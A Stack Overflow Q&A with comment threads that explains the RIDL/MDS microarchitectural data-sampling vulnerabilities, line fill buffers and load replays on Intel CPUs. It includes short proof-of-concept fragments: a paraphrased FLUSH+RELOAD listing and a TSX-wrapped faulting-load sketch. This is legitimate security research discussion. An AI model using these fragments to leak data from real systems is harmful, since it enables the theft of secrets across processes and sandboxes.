About the RIDL vulnerabilities and the "replaying" of loads

I'm trying to understand the RIDL class of vulnerability.

This is a class of vulnerabilities that is able to read stale data from various micro-architectural buffers.
Today the known vulnerabilities exploit the LFBs, the load ports, the eMC and the store buffer.

The paper linked is mainly focused on LFBs.

I don't understand why the CPU would satisfy a load with the stale data in an LFB.
I can imagine that if a load misses in L1d it is internally "replayed" until the L1d brings the data into an LFB, signalling the OoO core to stop "replaying" it (since the data read is now valid).

However, I'm not sure what "replay" actually means.
I thought loads were dispatched to a load-capable port and then recorded in the load buffer (in the MOB), where they are eventually held as needed until their data is available (as signalled by the L1).
So I'm not sure how "replaying" comes into play; furthermore, for RIDL to work, each attempt to "play" a load should also unblock dependent instructions.
This seems weird to me, as the CPU would need to keep track of which instructions to replay after the load correctly completes.

The paper on RIDL uses this code as an example (unfortunately I had to paste it as an image since the PDF layout didn't allow me to copy it):

[Listing 1 from the RIDL paper, included as an image in the original question]
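
Since the listing can't be copied from the PDF, here is a paraphrase of it, reconstructed from the paper's description (so not a verbatim copy); flush() and cycles() stand for CLFLUSH and a timestamp read, and new_page is the address the attacker loads from. The comments mark the line numbers referenced below:

    /* lines 1-3: flush every FLUSH+RELOAD buffer entry */
    for (k = 0; k < 256; ++k)
        flush(buffer + k * 1024);

    /* line 6: speculatively load the secret (the faulting/assisting load) */
    char value = *(new_page);
    /* line 8: calculate the corresponding buffer entry */
    char *entry_ptr = buffer + (1024 * value);
    /* line 10: load that entry into the cache */
    *(entry_ptr);

    /* lines 14-21: time the reload of each buffer entry to
       see which entry is now cached */
    for (k = 0; k < 256; ++k) {
        t0 = cycles();
        *(buffer + 1024 * k);
        dt = cycles() - t0;
        if (dt < 100)
            ++results[k];
    }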

The only reason it could work is if the CPU first satisfies the load at line 6 with stale data and then replays it.
This seems confirmed a few lines below:

Specifically, we may expect two accesses to be fast, not just the one corresponding to the leaked information. After all, when the processor discovers its mistake and restarts at Line 6 with the right value, the program will also access the buffer with this index.

But I would expect the CPU to check the address of the load before forwarding the data from the LFB (or any other internal buffer).
Unless the CPU actually executes the load repeatedly until it detects that the data loaded is now valid (i.e. replaying it).
But, again, why would each attempt unblock dependent instructions?

How exactly does the replaying mechanism work, if it even exists, and how does it interact with the RIDL vulnerabilities?

Cupped answered 17/5, 2019 at 13:19 Comment(5)
What is "eMC" ?Proem
@HadiBrais Embedded Memory Controller, at least the part attached to the Ring Bus.Cupped
I don't understand why the memory controller matters here. Table IV from the RIDL paper shows which hardware structures cause which vulnerability.Proem
@HadiBrais Me neither. Probably I've misinterpreted the picture on the front page, where the eMC is highlighted in red like the other data sources of the MDS vulnerabilities.Cupped
Ah, that's probably an error. It's clear from the RIDL and Fallout papers that the authors (like us) don't exactly understand what is happening.Proem

I don't think load replays from the RS are involved in the RIDL attacks. So instead of explaining what load replays are (@Peter's answer is a good starting point for that), I'll discuss what I think is happening based on my understanding of the information provided in the RIDL paper, Intel's analysis of these vulnerabilities, and relevant patents.

Line fill buffers are hardware structures in the L1D cache used to hold memory requests that miss in the cache, and I/O requests, until they get serviced. A cacheable request is serviced when the required cache line is filled into the L1D data array. A write-combining write is serviced when any of the conditions for evicting a write-combining buffer occurs (as described in the manual). A UC or I/O request is serviced when it is sent to the L2 cache (which occurs as soon as possible).

Refer to Figure 4 of the RIDL paper. The experiment used to produce these results works as follows:

  • The victim thread writes a known value to a single memory location. The memory type of the memory location is WB, WT, WC, or UC.
  • The victim thread reads the same memory location in a loop. Each load operation is followed by MFENCE, and there is an optional CLFLUSH. The paper doesn't make clear to me how CLFLUSH is ordered with respect to the other two instructions, but it probably doesn't matter. MFENCE serializes the cache line flushing operation, to see what happens when every load misses in the cache. In addition, MFENCE reduces contention between the two logical cores on the L1D ports, which improves the throughput of the attacker. (A minimal sketch of this loop follows the list.)
  • An attacker thread running on a sibling logical core executes the code shown in Listing 1 in a loop. The address used at Line 6 can be anything. The only thing that matters is that the load at Line 6 either faults or causes a page walk that requires a microcode assist (to set the accessed bit in the page table entry). A page walk requires using the LFBs as well, and most of the LFBs are shared between the logical cores.
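
As a minimal sketch of the victim loop described in the second bullet (my own reconstruction, not code from the paper; it assumes addr maps a page whose memory type was configured beforehand, and do_flush selects the "with flushing" variants):

    #include <stdint.h>

    /* One iteration of the hypothetical victim loop. */
    static inline void victim_iteration(volatile uint8_t *addr, int do_flush)
    {
        (void)*addr;                                  /* the load whose data lands in an LFB */
        asm volatile("mfence" ::: "memory");          /* serialize before the next access */
        if (do_flush)
            asm volatile("clflush %0" : "+m"(*addr)); /* optionally force the next load to miss */
    }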

It's not clear to me what the Y-axis in Figure 4 represents. My understanding is that it represents the number of lines from the covert channel that got fetched into the cache hierarchy (Line 10) per second, where the index of the line in the array is equal to the value written by the victim.

If the memory location is of the WB type, when the victim thread writes the known value to the memory location, the line will be filled into the L1D cache. If the memory location is of the WT type, when the victim thread writes the known value to the memory location, the line will not be filled into the L1D cache. However, on the first read from the line, it will be filled. So in both cases and without CLFLUSH, most loads from the victim thread will hit in the cache.

When the cache line for a load request reaches the L1D cache, it first gets written into the LFB allocated for the request. The requested portion of the cache line can be directly supplied to the load buffer from the LFB without having to wait for the line to be filled into the cache. According to the description of the MFBDS vulnerability, under certain situations, stale data from previous requests may be forwarded to the load buffer to satisfy a load uop. In the WB and WT cases (without flushing), the victim's data is written into at most 2 different LFBs. The page walks from the attacker thread can easily overwrite the victim's data in the LFBs, after which the data will never be found in there by the attacker thread. Load requests that hit in the L1D cache don't go through the LFBs; there is a separate path for them, which is multiplexed with the path from the LFBs. Nonetheless, there are some cases where stale data (noise) from the LFBs is speculatively forwarded to the attacker's logical core, which probably comes from the page walks (and maybe interrupt handlers and hardware prefetchers).

It's interesting to note that the frequency of stale data forwarding in the WB and WT cases is much lower than in all of the other cases. This could be explained by the fact that the victim's throughput is much higher in these cases, so the experiment may terminate earlier.

In all other cases (WC, UC, and all types with flushing), every load misses in the cache and the data has to be fetched from main memory to the load buffer through the LFBs. The following sequence of events occurs:

  1. The accesses from the victim hit in the TLB because they are to the same valid virtual page. The physical address is obtained from the TLB and provided to the L1D, which allocates an LFB for the request (due to a miss), and the physical address is written into the LFB together with other information that describes the load request. At this point, the request from the victim is pending in the LFB. Since the victim executes an MFENCE after every load, there can be at most one outstanding load from the victim in the LFBs at any given cycle.
  2. The attacker, running on the sibling logical core, issues a load request to the L1D and the TLB. Each load is to an unmapped user page, so it will cause a fault. When it misses in the TLB, the MMU tells the load buffer that the load should be blocked until the address translation is complete. According to paragraph 26 of the patent and other Intel patents, that's how TLB misses are handled. While the address translation is still in progress, the load is blocked.
  3. The load request from the victim receives its cache line, which gets written into the LFB allocated for the load. The part of the line requested by the load is forwarded to the MOB and, at the same time, the line is written into the L1D cache. After that, the LFB can be deallocated, but none of the fields are cleared (except for the field that indicates that it's free). In particular, the data is still in the LFB. The victim then sends another load request, which also misses in the cache, either because it is uncacheable or because the cache line has been flushed.
  4. The address translation process of the attacker's load completes. The MMU determines that a fault needs to be raised because the physical page is not present. However, the fault is not raised until the load is about to retire (when it reaches the top of the ROB). Invalid translations are not cached in the MMU on Intel processors. The MMU still has to tell the MOB that the translation has completed and, in this case, it sets a faulting code in the corresponding entry in the ROB. It seems that when the ROB sees that one of the uops has a valid fault/assist code, it disables all checks related to the sizes and addresses of that uop (and possibly all later uops in the ROB). These checks don't matter anymore. Presumably, disabling these checks saves dynamic energy consumption. The retirement logic knows that when the load is about to retire, a fault will be raised anyway. At the same time, when the MOB is informed that the translation is completed, it replays the attacker's load, as usual. This time, however, some invalid physical address is provided to the L1D cache. Normally, the physical address needs to be compared against all requests pending in the LFBs from the same logical core to ensure that the logical core sees the most recent values. This is done before or in parallel with looking up the L1D cache. The physical address doesn't really matter because the comparison logic is disabled; the results of all comparisons behave as if they indicate success. If there is at least one allocated LFB, the physical address will match some allocated LFB. Since there is an outstanding request from the victim, and since the victim's secret may have already been written in the same LFB by previous requests, the same part of the cache line, which technically contains stale data (and in this case the stale data is the secret), will be forwarded to the attacker. Note that the attacker has control over the offset within a cache line and the number of bytes to get, but it cannot control which LFB. The size of a cache line is 64 bytes, so only the 6 least significant bits of the virtual address of the attacker's load matter, together with the size of the load. The attacker then uses the data to index into its array to reveal the secret using a cache side channel attack. This behavior would also explain MSBDS, where apparently the data size and STD uop checks are disabled (i.e., the checks trivially pass). (A hedged sketch of the attacker's side of this step appears after the list.)
  5. Later, the faulting/assisting load reaches the top of the ROB. The load is not retired and the pipeline is flushed. In case of a faulting load, a fault is raised. In case of an assisting load, execution is restarted from the same load instruction, but with an assist to set the required flags in the paging structures.
  6. These steps are repeated, but the attacker may not always be able to leak the secret from the victim. As you can see, the load request from the attacker has to hit an allocated LFB entry that contains the secret. LFBs allocated for page walks and hardware prefetchers may make it harder to perform a successful attack.
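
To make step 4 concrete, here is a hedged sketch of the attacker's transient sequence. TSX is used here purely as one way to suppress the fault (the attack can also handle the fault in other ways, e.g. a signal handler); leak_addr and buffer are illustrative names, not the paper's code:

    #include <stdint.h>
    #include <immintrin.h>   /* _xbegin/_xend; compile with -mrtm */

    static void attacker_attempt(volatile uint8_t *leak_addr, uint8_t *buffer)
    {
        if (_xbegin() == _XBEGIN_STARTED) {
            /* Faulting load: may transiently be fed stale data from an LFB. */
            uint8_t value = *leak_addr;
            /* Encode the leaked byte into the cache state of the probe buffer. */
            (void)*(volatile uint8_t *)(buffer + 1024 * value);
            _xend();
        }
        /* A FLUSH+RELOAD pass over buffer[k * 1024] then recovers `value`. */
    }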

If the attacker's load didn't fault/assist, the LFBs will receive a valid physical address from the MMU and all checks required for correctness are performed. That's why the load has to fault/assist.

The following quote from the paper discusses how to perform a RIDL attack in the same thread:

we perform the RIDL attack without SMT by writing values in our own thread and observing the values that we leak from the same thread. Figure 3 shows that if we do not write the values (“no victim”), we leak only zeros, but with victim and attacker running in the same hardware thread (e.g., in a sandbox), we leak the secret value in almost all cases.

I think there are no privilege level changes in this experiment. The victim and the attacker run in the same OS thread on the same hardware thread. When returning from the victim to the attacker, there may still be some outstanding requests in the LFBs (especially from stores). Note that in the RIDL paper, KPTI is enabled in all experiments (in contrast to the Fallout paper).

In addition to leaking data from LFBs, MLPDS shows that data can also be leaked from the load port buffers. These include the line-split buffers and the buffers used for loads larger than 8 bytes in size (which I think are needed when the size of the load uop is larger than the size of the load port, e.g., 256-bit AVX loads on SnB/IvB, which occupy the port for 2 cycles).

The WB case (no flushing) from Figure 5 is also interesting. In this experiment, the victim thread writes 4 different values to 4 different cache lines instead of reading from the same cache line. The figure shows that, in the WB case, only the data written to the last cache line is leaked to the attacker. The explanation may depend on whether the cache lines are different in different iterations of the loop, which is unfortunately not clear in the paper. The paper says:

For WB without flushing, there is a signal only for the last cache line, which suggests that the CPU performs write combining in a single entry of the LFB before storing the data in the cache.

How can writes to different cache lines be combined in the same LFB before storing the data in the cache? That makes zero sense. An LFB can hold a single cache line and a single physical address. It's just not possible to combine writes like that. What may be happening is that WB writes are being written into the LFBs allocated for their RFO requests. When the invalid physical address is transmitted to the LFBs for comparison, the data may always be provided from the LFB that was last allocated. This would explain why only the value written by the fourth store is leaked.

For information on MDS mitigations, see: What are the new MDS attacks, and how can they be mitigated?. My answer there only discusses mitigations based on the Intel microcode update (not the very interesting "software sequences").


The following figure shows the vulnerable structures that use data speculation.


Proem answered 18/5, 2019 at 4:56 Comment(22)
I wasn't aware, reading the paper, that the load had to be faulting or assisted. Re-reading it, this is indeed required. I'm taking some time to fully re-read/grasp your answer. Please be patient :)Cupped
Out of curiosity, is it correct to say that dependent uops are replayed from the ROB?Cupped
@MargaretBloom That's not possible because there is no path from the ROB to the execution ports. Uops can only be replayed from the RS or the MOB. My current understanding is that when a load uop misses in the TLB, it may be replayed from the load buffer to the L1D cache (not the RS) when the physical address is provided to the load buffer. On the other hand, if the virtual address of the load is itself wrong (obtained from a uop on a mispredicted path) or is not available (the load uop has been dispatched when the scheduler has predicted that the virtual address will be available...Proem
...on the bypassing network but it is not, because e.g. the uop that supplies the virtual address missed in the L1D cache), then the load uop has to be dispatched and go through the whole load pipe (through the loose net, fine net, and MMU). Otherwise, if the virtual address is known, there is no need to go through the load pipe and unnecessarily consume a load execution port. It would be better to find patents to confirm all of this. In case of machine clears, the load uop is re-issued from the allocator.Proem
I meant from the ROB -> Scheduler -> Execution ports. The load can stay in the Load Buffer, but what about subsequent dependent uops? They must stay in the scheduler, I guess. So the scheduler cannot simply remove them after dispatching them. It must know they depend on a load that is possibly using speculative data. Isn't this kind of a duplication of the ROB functionalities?Cupped
@MargaretBloom: I don't think there's any mechanism for copying a uop from the ROB into the scheduler. Once it's gone from the RS, it's not coming back, other than a pipeline flush to an earlier state, leading to the front-end re-issuing it. So my understanding is that uops can't be removed from the RS until they've completed successfully, not just dispatched. Hadi, are you saying that the MOB lets the scheduler know when a load uop can be re-dispatched (e.g. when data arrives from off-core)? Surely the scheduler still has to track its dependencies, and not issue another uop to that port.Forta
@MargaretBloom: Isn't this kind of a duplication of the ROB functionalities? Not really; the ROB doesn't track dependencies, only whether or not a uop (or all the uops making up a whole instruction) have completed execution. This presumably takes 1 bit per entry, vs. the RS dropping uops for which that's the case. The ROB is presumably a circular buffer, with retirement removing contiguous completed uops at the tail (and freeing any extra resources allocated for the uop, e.g. load buffer to check for memory order mis-speculation), and issue adding uops at the head.Forta
@Hadi: why is this speculation only done for loads that will cause a fault/assist? My guess: it's probably always done, but if a fault is detected then the load port just drops everything and moves on (to save power), with the "output" buffer holding whatever it did at the time. Non-faulting loads generate actual inputs for the muxers that feed the load-result output buffer from either an LFB, L1d, or store-forwarding. Again, this is a total guess; a design that sounds plausible and explains the observations, given the little I know about CPU logic design.Forta
@MargaretBloom and Peter, the fundamental difference between the ROB and the RS is that the ROB is a circular buffer and therefore maintains program order efficiently. The RS cannot efficiently determine program order. If there were no ROB, the RS would have to check the order of all uops every cycle to determine whether the oldest one is ready to retire. This is obviously too inefficient. The ROB is there mainly for this purpose. There are many other diffs, of course, such as that the ROB maintains different information and the RS entries can be freed earlier, but these are not fundamental differences.Proem
Efficient in terms of both performance and power. But yes, there are fields that are duplicated in both the RS and ROB so that they can be accessed efficiently by both without contention.Proem
@MargaretBloom Regarding replay, I went back to refresh my knowledge from Intel patents on replay (there are many of them). There are 4 different kinds of "replay": (1) replay from the RS when the scheduler mispredicts the time an operand arrives on the forwarding network, (2) replay from the MOB, which occurs when the access misses in the TLB, (3) partial replay from the uop cache, which occurs when a uop has completed execution or is being executed with the wrong operands, and (4) full replay, which is a pipeline flush. Apparently, there can be multiple concurrent replays of the same uop. How cool is that!Proem
@PeterCordes and HadiBrais, thank you for your answers.Cupped
@HadiBrais: Those definitions of "replay" include re-issue, though. I'm not clear on "replay from the uop cache", that doesn't make sense to me because I thought the only path from uop cache to RS / execution units was via the normal front-end IDQ + issue + rename. Oh, "partial replay" may mean branch miss with fast recovery, which does discard all uops after the mispredicted branch and issue the correct path. It may rejoin the path that was already in the RS, but maybe with a different dep chain so IDK if I'd call that the same uop. It's a different instance for the same x86 instruction.Forta
@PeterCordes I haven't read the patents thoroughly, so I don't have the full picture. Also, different patents may apply to different microarchitectures. I think on a branch mispredict, a full replay occurs. Partial replay refers to replaying selected uops that are not necessarily contiguous in the program order. Although it's possible to replay uops from the RS by not freeing the RS entry when one of the operands is provided speculatively (speculative store forwarding). The RS entry is only freed when none of the operands of the uop are speculative. The load matrix may enable such an implementation.Proem
@MargaretBloom I've rewritten a large part of the answer in the form of a sequence of events for better clarity. I've also added a possible explanation for why the attacker's load has to fault/assist. Let me know whether any of this makes any sense.Proem
Thanks @HadiBrais. The only thing that seems off to me is "At the same time, when the MOB is informed that the translation is completed, it replays the attacker's load, as usual.", but at this point the attacker's load has never executed yet, if I followed the points correctly. Side note: I was under the impression that what happens is that the scheduler dispatches the load and the dependent uops assuming the load will hit in L1. I.e. it will make the dependent uops get their input from the writeback/forward network ...Cupped
This network is a mux fed from the LFB, L1d and the split registers (at least); the real source is selected correctly if the physical address is known by the time the dependent uops read from it (thanks to a TLB hit). But if the phys addr is missing (TLB miss or non-present PTE), or the load is faulting (this'll save energy), the network reuses the last used configuration, leaking the data. If the load is faulting it is not replayed; if it is assisted, it will be replayed when the MMU signals the MOB that it has the phys addr.Cupped
However, this model differs from points 2 and 5, and you have a patent backing them up, so I guess yours is the correct one.Cupped
@MargaretBloom In the terminology I'm using, sending the virtual address of the load to the TLB is one step of executing the load uop. The replay involves re-executing those steps that have already been executed; it doesn't necessarily mean full re-execution. Regarding the other comment, I think there needs to be a request to the L1D to get any data; I mean the (stale) data cannot just by itself appear on the forwarding network without a request. That's why I think the MOB doesn't care whether a fault occurred and it will just replay the load anyway and get stale data.Proem
Meltdown is similar except that the attacker loads from a kernel address with a valid translation. The MOB doesn't care that the privilege check has failed, but in this case, the load will proceed normally with a valid physical address. In RIDL, an invalid physical address seems to be used and the actual physical address is only provided after handling the fault/assist.Proem
@Margaret, FWIW my impression of how it works is exactly as your comment and the next one describe. That is, that the core mechanism is that the dependent uops of the attacker's load assume the load result will appear on the bypass network with the best possible timing (L1 hit) and use whatever values they find there even if there wasn't a hit, which ends up being whatever was connected to the bypass network by the last thing that used that port/bypass path.Novocaine
If the attacker's load hits, of course it means the right data is there. If the attacker's load misses in L1 (but didn't fault/TLB miss), the bypass network apparently still contains something, but not a leaked secret from the LFB (assuming they tried this). Or maybe it does get something stale from the LFB in that case, but recovery is fast enough that it doesn't get leaked by the subsequent probe.Novocaine

replay = being dispatched again from the RS (scheduler). (This isn't a complete answer to your whole question, just to the part about what replays are. Although I think this covers most of it, including unblocking dependent uops.)

Note: parts of this answer have a misunderstanding about load replays.

See discussion in chat - uops dependent on a split or cache-miss load get replayed, but not the load itself. (Unless the load depends on itself in a loop, like I had been doing for testing >.<). TODO: fix the rest of this answer and others.


It turns out that a cache-miss load doesn't just sit around in a load buffer and wake up dependent uops when the data arrives. The scheduler has to re-dispatch the load uop to actually read the data and write-back to a physical register. (And put it on the forwarding network where dependent uops can read it in the next cycle.)

So L1 miss / L2 hit will result in 2x as many load uops dispatched. (The scheduler is optimistic, and L2 is on-core so the expected latency of an L2 hit is fixed, unlike time for an off-core response. IDK if the scheduler continues to be optimistic about data arriving at a certain time from L3.)


The RIDL paper provides some interesting evidence that load uops do actually directly interact with LFBs, not waiting for incoming data to be placed in L1d and just reading it from there.


We can observe replays in practice most easily for cache-line-split loads, because causing that repeatedly is even more trivial than cache misses, taking less code. The counts for uops_dispatched_port.port_2 and port_3 will be about twice as high for a loop that does only split loads. (I've verified this in practice on Skylake, using essentially the same loop and testing procedure as in How can I accurately benchmark unaligned access speed on x86_64)
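
As a hedged sketch of such a test (my own construction, not Peter's exact loop): an 8-byte load that starts 4 bytes before a 64-byte boundary splits across two cache lines on every iteration.

    #include <stdint.h>
    #include <stdlib.h>

    int main(void)
    {
        uint8_t *buf = aligned_alloc(64, 128);   /* 64-byte-aligned buffer */
        volatile uint64_t sink;
        for (long i = 0; i < 100000000L; ++i)
            sink = *(uint64_t *)(buf + 60);      /* bytes 60..67: a line-split load */
        free(buf);
        return 0;
    }

On Skylake, running something like perf stat -e uops_dispatched_port.port_2,uops_dispatched_port.port_3 over this loop should then count roughly two dispatches per load.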

Instead of signalling successful completion back to the RS, a load that detects a split (only possible after address-calculation) will do the load for the first part of the data, putting this result in a split buffer (footnote 1) to be joined with the data from the 2nd cache line the 2nd time the uop dispatches. (Assuming that neither time is a cache miss, otherwise it will take replays for that, too.)


When a load uop dispatches, the scheduler anticipates that it will hit in L1d and dispatches dependent uops so they can read the result from the forwarding network in the cycle the load puts it on that bus.

If that didn't happen (because the load data wasn't ready), the dependent uops will have to be replayed as well. Again, IIRC this is observable with the perf counters for dispatch to ports.


Existing Q&As with evidence of uop replays on Intel CPUs:


Footnote 1:

We know there are a limited number of split buffers; there's a ld_blocks.no_sr counter for loads that stall for lack of one. I infer they're in the load port because that makes sense. Re-dispatching the same load uop will send it to the same load port because uops are assigned to ports at issue/rename time. Although maybe there's a shared pool of split buffers.


RIDL:

Optimistic scheduling is part of the mechanism that creates a problem. The more obvious problem is letting execution of later uops see a "garbage" internal value from an LFB, like in Meltdown.

http://blog.stuffedcow.net/2018/05/meltdown-microarchitecture/ even shows that Meltdown-style loads on PPro expose various bits of microarchitectural state, exactly like this vulnerability that still exists in the latest processors.

The Pentium Pro takes the “load value is a don’t-care” quite literally. For all of the forbidden loads, the load unit completes and produces a value, and that value appears to be various values taken from various parts of the processor. The value varies and can be non-deterministic. None of the returned values appear to be the memory data, so the Pentium Pro does not appear to be vulnerable to Meltdown.

The recognizable values include the PTE for the load (which, at least in recent years, is itself considered privileged information), the 12th-most-recent stored value (the store queue has 12 entries), and rarely, a segment descriptor from somewhere.

(Later CPUs, starting with Core 2, expose the value from L1d cache; this is the Meltdown vulnerability itself. But PPro / PII / PIII isn't vulnerable to Meltdown. It apparently is vulnerable to RIDL attacks in that case instead.)

So it's the same Intel design philosophy that's exposing bits of microarchitectural state to speculative execution.

Squashing that to 0 in hardware should be an easy fix; the load port already knows it wasn't successful so masking the load data according to success/fail should hopefully only add a couple extra gate delays, and be possible without limiting clock speed. (Unless the last pipeline stage in the load port was already the critical path for CPU frequency.)
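
In rough C pseudologic (purely illustrative of the gating idea, not an actual hardware description):

    /* Illustrative only: gate the load result on the port's success signal,
       so a faulting/assisting load forwards 0 instead of stale buffer data. */
    uint64_t forwarded = load_succeeded ? raw_load_data : 0;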

So it's probably an easy and cheap fix in hardware for future CPUs, but very hard to mitigate with microcode and software for existing CPUs.

Forta answered 17/5, 2019 at 14:36 Comment(13)
So a dependent uop will be kept in the RS until the load is marked as successfully completed? Basically, each uop has a "successfully executed" bit that is valid iff it is set in the uop itself and in all previous uops (which is easy to check since the RS is filled in order). So it's the optimistic nature of the scheduler that's at fault with RIDL.Cupped
@MargaretBloom: Every uop stays in the RS until it itself is successfully executed. Once a uop has successfully executed, it's dropped from the RS entirely making room for new ones. (But yes the ROB will have a bit to track "executed", i.e. ready to retire if/when retirement gets through all previous successfully executed uops. Checking previous uop status probably doesn't happen until retirement.) Even detection of a branch miss isn't a problem: all uops from after the mis-speculation are discarded from the ROB + RS anyway, and the correct path fed in from issue/rename.Forta
@MargaretBloom: updated my answer with a rewrite of my 2nd (now deleted) comment.Forta
Intel is releasing a ucode update with a new command (or instruction) to be used to clear all uarch buffers on a privileged context switch. So maybe squashing the load value to 0 is not always possible (e.g. in case of a TLB miss?), or that fix will only arrive in new generations.Cupped
@MargaretBloom: Like I said in my answer, it should be easy to fix with a change to the design of the fixed-function hardware (a new uarch), but not with just a microcode update for existing hardware. CPUs aren't FPGAs that can be arbitrarily reconfigured by microcode; microcode can only use existing hooks provided by the HW to e.g. disable or flush stuff. (e.g. Skylake microcode disables the loop buffer instead of just fixing the bug, because the designers made it possible for ucode to do that, presumably in case of the discovery of such a bug. The P5 FDIV and F00F bugs inspired caution!)Forta
Apparently, flushing the affected buffers is an existing hook, since that's what Intel is releasing for existing CPUs. So the last phrase doesn't seem totally correct.Cupped
@MargaretBloom: presumably it takes multiple uops to do it, though; I'm not totally surprised they were able to cobble together a microcode sequence that sets internal state to "safe" values, maybe by abusing uops intended for something else. Like maybe storing zeros to some dummy address that won't actually write to physical memory anywhere? Anyway, the last paragraph of my answer is still valid; a new MSR to write to trigger a manual flush won't help much to defend a Javascript sandbox against webasm from within the same process: no context switch.Forta
(The "new instruction" added for Spectre microcode mitigation is actually a new MSR you can write to. That's the only hook Intel has for adding completely new things in microcode because the actual decoders are partly fixed-function; it wouldn't have been possible to add an actual new instruction with its own opcode. But MSR write/read are basically hooks into microcode with a "call number" and one input or output arg. It's safe to assume the new hook for this will also be an MSR write.)Forta
Very true indeed! BTW thanks for the addendum on RIDL.Cupped
@MargaretBloom and Peter, the microcode update augments the behavior of the VERW instruction so that it gets decoded into many more uops. These additional uops are memory load and store uops that simply overwrite all of the MDS-affected buffers with some safe value (e.g., zero). These are equivalent to the software sequences shown by Intel, which can be used for processors without the microcode update. VERW has always been microcoded on all processors that support it. So the update (among other things) changes the microcode routine of VERW and it doesn't change anything else.Proem
@HadiBrais: ah, so that makes it available for user-space, unlike adding another MSR. Neat.Forta
I remember discussing cache-line split registers with you in some comment section on Stack Overflow, but I can't find it. Do you remember where?Proem
@HadiBrais: no, I don't, and google isn't finding it. Sometimes site:stackoverflow.com "cordes" ... finds discussions I've had in comments, but either I missed it or google it wasn't in the results.Forta